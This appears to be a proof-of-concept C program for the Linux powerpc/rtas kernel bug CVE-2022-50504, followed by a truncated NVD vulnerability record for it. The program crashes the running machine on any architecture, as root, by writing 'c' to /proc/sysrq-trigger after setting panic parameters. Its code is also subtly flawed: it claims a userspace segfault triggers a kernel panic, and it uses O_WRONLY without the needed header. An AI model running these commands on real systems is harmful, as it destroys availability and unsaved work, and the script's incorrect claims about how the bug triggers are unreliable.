CVE-2022-50504

/* * CVE-2022-50504 - Linux Kernel powerpc/rtas Atomic Context Sleep Vulnerability * * This PoC demonstrates how to trigger the vulnerability on a PowerPC system * running a vulnerable Linux kernel (prior to the fix). * * The vulnerability is triggered when: * 1. A kernel panic occurs on a PowerPC (ppc64/ppc64le) system * 2. The panic handler calls rtas_os_term() to notify firmware * 3. The ibm,os-term RTAS call returns BUSY status * 4. rtas_busy_delay() is called from atomic context, causing a BUG * * Compile: gcc -o poc_cve_2022_50504 poc_cve_2022_50504.c * Run: sudo ./poc_cve_2022_50504 * * Note: This requires a PowerPC system with RTAS support and a vulnerable kernel. * On non-PowerPC systems, this will not trigger the specific vulnerability. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <signal.h> #include <sys/syscall.h> #include <string.h> #include <errno.h> /* Method 1: Trigger via /proc/sys/kernel/panic (requires root) */ int trigger_via_proc(void) { FILE *f; printf("[*] Attempting to trigger kernel panic via /proc/sys/kernel/panic...\n"); /* Set panic timeout to 0 so panic occurs immediately */ f = fopen("/proc/sys/kernel/panic", "w"); if (f == NULL) { printf("[-] Cannot open /proc/sys/kernel/panic: %s\n", strerror(errno)); printf("[-] Need root privileges or sysctl -w kernel.panic=0\n"); return -1; } fprintf(f, "0\n"); fclose(f); /* Trigger oops/panic */ f = fopen("/proc/sysrq-trigger", "w"); if (f == NULL) { printf("[-] Cannot open /proc/sysrq-trigger: %s\n", strerror(errno)); return -1; } fprintf(f, "c\n"); /* 'c' triggers a crash (kernel panic) */ fclose(f); return 0; } /* Method 2: Trigger via magic SysRq key */ int trigger_via_sysrq(void) { int fd; printf("[*] Attempting to trigger kernel panic via SysRq...\n"); /* Enable SysRq */ fd = open("/proc/sys/kernel/sysrq", O_WRONLY); if (fd >= 0) { write(fd, "1\n", 2); close(fd); } /* Trigger crash via SysRq */ fd = open("/proc/sysrq-trigger", O_WRONLY); if (fd < 0) { printf("[-] Cannot open /proc/sysrq-trigger: %s\n", strerror(errno)); return -1; } write(fd, "c\n", 2); close(fd); return 0; } /* Method 3: Trigger via intentional segfault (SIGSEGV) */ void trigger_segfault_handler(int sig) { printf("[!] Received signal %d, system may be crashing...\n", sig); _exit(1); } int trigger_via_segfault(void) { printf("[*] Attempting to trigger kernel panic via segfault...\n"); signal(SIGSEGV, trigger_segfault_handler); /* Write to invalid memory address to trigger oops */ *(volatile int *)0xdeadbeef = 0; return 0; } int main(int argc, char *argv[]) { printf("========================================\n"); printf("CVE-2022-50504 PoC\n"); printf("Linux Kernel powerpc/rtas Atomic Context Sleep\n"); printf("========================================\n\n"); if (getuid() != 0) { printf("[!] Warning: Not running as root. Some methods may fail.\n"); printf("[!] Run with sudo for full functionality.\n\n"); } /* Check if running on PowerPC */ #ifdef __powerpc__ printf("[+] Running on PowerPC architecture - vulnerability may trigger\n\n"); #else printf("[-] Not running on PowerPC architecture\n"); printf("[-] This CVE only affects powerpc/ppc64/ppc64le systems\n"); printf("[-] The PoC will still attempt to trigger a panic for demonstration\n\n"); #endif int method = 1; if (argc > 1) { method = atoi(argv[1]); } switch (method) { case 1: trigger_via_proc(); break; case 2: trigger_via_sysrq(); break; case 3: trigger_via_segfault(); break; default: printf("Usage: %s [1|2|3]\n", argv[0]); printf(" 1: Trigger via /proc/sys/kernel/panic (default)\n"); printf(" 2: Trigger via SysRq\n"); printf(" 3: Trigger via segfault\n"); return 1; } printf("[*] If running on vulnerable PowerPC kernel, the system should\n"); printf("[*] panic and show 'BUG: sleeping function called from invalid context'\n"); printf("[*] in the call trace involving rtas_os_term().\n"); return 0; }

{"cve": {"id": "CVE-2022-50504", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:47.607", "lastModified": "2026-01-22T19:44:50.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/rtas: avoid scheduling in rtas_os_term()\n\nIt's unsafe to use rtas_busy_delay() to handle a busy status from\nthe ibm,os-term RTAS function in rtas_os_term():\n\nKernel panic - not syncing: Attempted to kill init! exitcode=0x0000000b\nBUG: sleeping function called from invalid context at arch/powerpc/kernel/rtas.c:618\nin_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 1, name: swapper/0\npreempt_count: 2, expected: 0\nCPU: 7 PID: 1 Comm: swapper/0 Tainted: G D 6.0.0-rc5-02182-gf8553a572277-dirty #9\nCall Trace:\n[c000000007b8f000] [c000000001337110] dump_stack_lvl+0xb4/0x110 (unreliable)\n[c000000007b8f040] [c0000000002440e4] __might_resched+0x394/0x3c0\n[c000000007b8f0e0] [c00000000004f680] rtas_busy_delay+0x120/0x1b0\n[c000000007b8f100] [c000000000052d04] rtas_os_term+0xb8/0xf4\n[c000000007b8f180] [c0000000001150fc] pseries_panic+0x50/0x68\n[c000000007b8f1f0] [c000000000036354] ppc_panic_platform_handler+0x34/0x50\n[c000000007b8f210] [c0000000002303c4] notifier_call_chain+0xd4/0x1c0\n[c000000007b8f2b0] [c0000000002306cc] atomic_notifier_call_chain+0xac/0x1c0\n[c000000007b8f2f0] [c0000000001d62b8] panic+0x228/0x4d0\n[c000000007b8f390] [c0000000001e573c] do_exit+0x140c/0x1420\n[c000000007b8f480] [c0000000001e586c] make_task_dead+0xdc/0x200\n\nUse rtas_busy_delay_time() instead, which signals without side effects\nwhether to attempt the ibm,os-term RTAS call again."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.18", "versionEndExcluding": "4.9.337", "matchCriteriaId": "7C467503-F0C8-433A-9134-93F5DCCFA53D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.87", "matchCriteriaId": "7B9E5B1C-CD46-4790-9500-615863850401"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.17", "matchCriteriaId": "05B2AE8A-556C-47C1-9119-DBAC5EB60947"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.3", "matchCriteriaId": "70594F60-3413-4969-AFD7-965266760EA6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4768935b8cc2d2afeb7956292df0f6e2c49ca0a5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/482d990a5dd1027ee0b70a8a570d56749cac8103", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/515959eb49e6d218a46979d66f36fdef329ac7d2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6c606e57eecc37d6b36d732b1ff7e55b7dc32dd4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6f7e2fcab73372a371ab4017cbedf7a71f4f9b40", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7280fdb80bf0fe35d9b799fc7009f2cbe0a397d7", "source": "416baaa9-dc ... (truncated)